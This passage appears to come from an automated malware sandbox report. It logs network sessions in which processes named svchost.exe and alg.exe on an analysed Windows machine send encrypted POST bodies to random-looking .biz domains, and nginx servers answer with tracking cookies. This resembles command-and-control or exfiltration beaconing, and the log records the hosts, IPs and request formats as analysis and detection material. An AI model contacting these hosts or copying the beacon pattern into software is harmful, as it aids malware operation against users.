                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:36.256444931 CEST778OUTData Raw: ec af 33 30 c9 c4 31 be fe 02 00 00 53 cc 3a 92 98 0b 3a e8 c2 c4 5b a8 17 d6 77 24 62 33 c8 6c 1f 84 50 d6 c8 88 71 0f e9 87 37 5c 4c 82 b2 04 bc ea 9c ea 51 42 99 71 95 f7 e2 4e 06 27 7a c5 28 e1 c2 fb 96 c7 c8 00 d4 55 ea 2f c5 6e bd c9 f3 83
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 301S::[w$b3lPq7\LQBqN'z(U/n`bSe?/v~_QI.L_qB5ZUss033}oX}uA~S>\nf[V*-38\Yh;:A"4'OQ9X


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              24192.168.2.44978247.129.31.212804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:36.478475094 CEST354OUTPOST /fwbtaqdcjwd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:36.478475094 CEST786OUTData Raw: 9e 96 54 d9 fc b1 a7 31 06 03 00 00 1e cb 9d 49 db 19 64 2e 50 66 7c 0e ae e3 61 91 ec 45 13 34 7e 29 cc 82 1e 53 a0 69 3e 01 db ee 2b 4e 65 ab 44 c4 73 fa 20 27 09 21 2b c9 7a 67 78 3d cd e4 fb 41 46 75 25 6e 9f 39 69 e7 09 15 9c c7 2a a6 8d 99
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: T1Id.Pf|aE4~)Si>+NeDs '!+zgx=AFu%n9i*aUcA>6H'0sRqHXWI=M\G2?"<Ax'j*1E/2pjto~bg'=1Z!
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.110554934 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=9673f278cadce04de0a6615a4b4633af|8.46.123.33|1728394117|1728394117|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.110621929 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=9673f278cadce04de0a6615a4b4633af|8.46.123.33|1728394117|1728394117|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              25192.168.2.44978913.251.16.150804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.590487003 CEST346OUTPOST /gcsq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.591502905 CEST786OUTData Raw: 47 e6 91 6e f0 0e f5 e6 06 03 00 00 1e 3d 61 fc 95 a9 dd 9e 77 13 fc 3f 48 7c a3 d1 d0 0d f9 b0 93 84 f8 da fd 38 e3 1c e0 87 30 64 f1 83 11 cc eb b9 2f f4 1e d5 03 8b 00 0d 0d 3d 9b e7 73 d7 a8 78 ff 26 35 e6 f0 58 11 71 b6 e5 42 34 0d 86 09 a7
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Gn=aw?H|80d/=sx&5XqB46CHL[4D@:D87o"RHNzT.]T%Y(+^8C~QxX{{@< FCc*8BY.Y+4RyB9`1U]@hR=i6Ml
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.933912992 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=c0a974cb2196b3298a947bde11526b21|8.46.123.33|1728394119|1728394119|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              26192.168.2.44979047.129.31.212802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.773391962 CEST352OUTPOST /hbkwpskje HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.773411989 CEST778OUTData Raw: fd c0 b2 1a 53 c8 bf c9 fe 02 00 00 5e fd ed 9e b2 b0 25 64 08 74 0d 48 63 ef 86 bb 3c e2 c4 1e 36 aa 66 f3 0a 06 47 a1 89 e7 5b 06 0c 73 3c ed 5e f2 82 f4 46 a1 01 55 6d bc 2a 01 ce e2 ef 41 2d bb b6 e4 18 04 75 67 6a 79 94 d8 61 14 47 99 ab ea
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: S^%dtHc<6fG[s<^FUm*A-ugjyaG*p#!vQtni0o$A]|7?2k- XcOE;~Tb/U0]X!bZ[*M}kMDvN]#@4v<NP6'$/
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.138302088 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=28566dd944eb61877046d054009ab41e|8.46.123.33|1728394119|1728394119|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              27192.168.2.44979644.221.84.105804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.057308912 CEST347OUTPOST /js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.057342052 CEST786OUTData Raw: c7 8a 60 71 b7 e9 f5 da 06 03 00 00 68 f4 1a 3a 39 7f 0b f0 52 3a fe 42 41 55 b5 26 f1 c7 f0 0d e3 62 bc 7b 39 86 0e 95 c7 e6 5a 63 be 90 68 17 ec cf 5c 1e 13 69 a1 26 c1 ec da 36 9d 23 9d b4 05 fb ff 82 9f 57 b1 a3 09 82 37 f3 2f af 43 3a f1 87
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: `qh:9R:BAU&b{9Zch\i&6#W7/C:9C"(RNEM04^XnZ\h,~L"zt,gJ5)4E1rqloS%03/[|4^(0zbZd1:W"#*7t
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.516211033 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=da3d3ac67e6c6b9de91326cf18684359|8.46.123.33|1728394120|1728394120|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              28192.168.2.44980218.141.10.107804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.651283026 CEST357OUTPOST /feejetjxxjumqw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.651297092 CEST786OUTData Raw: 3c f5 2b 98 96 77 37 05 06 03 00 00 41 6d d3 3f 13 05 71 74 cd 47 17 97 09 16 71 2c 43 59 b3 a6 a3 14 57 07 53 79 58 db 1e f9 30 28 d0 3b 26 ee e0 ac 4e b7 43 e9 33 59 aa 3d 98 aa 65 af 27 3c 2d 29 b5 e0 b8 4d bc 0a c5 19 b9 63 0e 21 16 92 79 21
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <+w7Am?qtGq,CYWSyX0(;&NC3Y=e'<-)Mc!y!(C"J5Yz|^2lzpv)aM_4`\0S_zOywOv_41P?-8_}f:9c.Z;ZtkL
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.002263069 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=7b945d75c0aa421da016d95ad0c97e28|8.46.123.33|1728394121|1728394121|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              29192.168.2.44980313.251.16.150802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.657304049 CEST355OUTPOST /scwkixjormncu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.657334089 CEST778OUTData Raw: 68 9c ac e8 9f 29 ad 2e fe 02 00 00 80 df 15 46 76 2a db 32 59 c1 4a fd 7a 0c e3 a2 17 36 bf 92 52 1e 9e 73 27 b9 91 45 eb 71 7d 8a 70 94 ff b6 b0 5f b3 78 ae 13 47 ad 11 1c b1 56 12 54 32 d9 28 86 fa 25 07 9e 93 24 a4 2a 02 eb f5 ad 6f 5c a6 c0
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: h).Fv*2YJz6Rs'Eq}p_xGVT2(%$*o\t+!l+a;|`v4qvPf_c.8,R &AmKsM5\+e>z_I_=,;{r#&GkPticNLI3w[F_A 79*%==zLM
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.483659983 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=537677ccf0badce01ffc9a24ee2754b2|8.46.123.33|1728394121|1728394121|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              30192.168.2.449815172.234.222.143804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.519171953 CEST348OUTPOST /dgcyhyi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.519207954 CEST786OUTData Raw: 99 92 ca ad 90 b6 86 3a 06 03 00 00 0b 6e 3c da c0 eb f4 28 51 b0 8d 4d 6a 60 0a 0a c6 21 31 7c 8a 13 5a 67 fd e4 99 2a b4 f6 24 ae ad 11 40 ec ad fa a5 2b e5 da a4 8b 94 7c fc 39 eb 7b de ee 58 eb 13 79 ad 9b 0d 58 63 7d b7 7a b4 86 3c 81 dd c4
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: :n<(QMj`!1|Zg*$@+|9{XyXc}z<-P3.2yA#no&d}[qZl>@Xm=%f`x;Hm 0ZTk*YWE,q6.xs#")g5}[J5[A


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              31192.168.2.44982044.221.84.105802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.923901081 CEST349OUTPOST /lnlr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.923935890 CEST778OUTData Raw: 98 37 15 b4 de 3e b3 03 fe 02 00 00 c5 6a e6 ff b9 c7 c6 2f e7 5d 3b 7f e8 eb 6c 03 36 4a 1c d7 f8 ad 7a c9 e5 ab 57 55 01 f2 3a 2c 92 b3 bf e3 c6 d6 8e 24 9f 2c 5d c5 4e 0e c3 d6 53 2d 1e f0 27 1a 89 24 ad ea 72 fd 62 d8 4a e8 75 3c 3e b6 9c e9
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 7>j/];l6JzWU:,$,]NS-'$rbJu<>\eg9OvTKy&``N6q;5`0r('W5JK'@"mKgvD5/j3gD.4(;]izT_."`*1r4[_!,"&#^5Xzy$
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.413654089 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=cebc97516ee1f879bcaeaf02a575af98|8.46.123.33|1728394123|1728394123|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              32192.168.2.449821172.234.222.143804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.052089930 CEST350OUTPOST /atyxaeuca HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.052119970 CEST786OUTData Raw: 38 68 83 db c9 52 2c ea 06 03 00 00 7e e7 fe 65 9b 7b 83 e9 74 29 eb 08 b9 ab 06 17 7d ca 32 b1 9b 8e 42 b7 fc 03 2e 54 2a 37 52 0e 08 9a eb ea b3 ac 08 86 7e 59 03 09 5f 94 2e e4 3f f7 25 a6 2c c8 0b 66 fa 2e 1e 0b 17 a6 1e 2f f5 b4 57 5a ae ca
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 8hR,~e{t)}2B.T*7R~Y_.?%,f./WZ%osDwZ"[(Xr`(tW^JQxnD@{8ydZC9LK\0"7G^I#;\_0G!ICTbKFSPJD%^p9YNs}Oe


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              33192.168.2.44982834.246.200.160804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.635837078 CEST353OUTPOST /ioljnnvkrvc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.636595964 CEST786OUTData Raw: e2 b2 d4 2d 99 df a2 07 06 03 00 00 85 2b 01 6f c9 2b 17 7d 73 ba 4a af 3e ed 7b 1b 02 21 bb 0e 25 ac 5b 97 30 aa 7b f3 73 4d c6 33 59 8c 53 60 4f 15 b6 76 5b 26 c1 16 48 ab 35 d7 fe b4 76 4b 11 c7 0e 58 1b 6d a6 00 75 66 27 1a 22 fe b6 fd 34 2f
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: -+o+}sJ>{!%[0{sM3YS`Ov[&H5vKXmuf'"4/iR*#<6(/?bJX4OpY<j0&6K$A}X`'`/AF+_D#}g?y{iYzN=#)<4}@e^ZG~)yd`K>9g8(+
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.385585070 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
